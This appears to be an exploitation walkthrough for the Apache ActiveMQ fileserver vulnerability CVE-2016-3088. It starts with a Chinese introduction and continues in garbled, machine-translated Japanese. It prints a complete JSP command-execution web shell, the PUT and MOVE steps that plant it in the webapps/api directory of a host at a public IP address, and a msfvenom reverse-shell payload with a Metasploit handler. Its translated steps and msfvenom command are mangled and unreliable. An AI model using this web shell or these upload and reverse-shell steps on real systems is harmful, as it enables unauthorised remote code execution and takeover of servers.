简介:2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程***者用恶意代码替代Web应用,在受影响系统上执行远程代码(CVE-2016-3088)。
8161端口为web控制台端口,本漏洞就出现在web控制台中。
ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。
fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:其使用率并不高而且文件操作容易出现漏洞。
所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。
1.直接書き込みシェルの
増加の背後にあるいくつかの行に入れて直接ポストにbpの傍受後にアクセスhttp://120.79.1.70:8161/fileserver
<%@ page import="java.util.*,java.io.*"%> <% %>
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment">
<INPUT TYPE="submit" VALUE="Send">
</FORM> <pre>
<%
if ( request.getParameter( "comment" ) != null )
{
out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
Process p = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream( in );
String disr = dis.readLine();
while ( disr != null )
{
out.println( disr ); disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
図は次のとおりです。chen.txtを:
次いで、一緒にバック行移動に入れた後に204は、成功したリターンを表します
Destination:file:///opt/activemq/webapps/api/s.jsp
最後に、成功APIの背面に直接アクセスを追加
2.書き込みシェルのcronタイマータスクが使用する方法
今カーリー内部を生成***
msfvenom -pジャワ/ jsp_shell_reverse_tcp lhost lportは= 9999 = R&LT 192.168.199.109> bing.jspを
下に示すように、オープン彼のデスクトップをアップロードします。
以前と同じでは最初の行の後の行を追加した後
Destination:file:///opt/activemq/webapps/api/s.jsp
そこのウェブサイトかどうかを確認するには
オープニングカーリー後
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.199.109
set lport 9999
run
成功に耳を傾けます!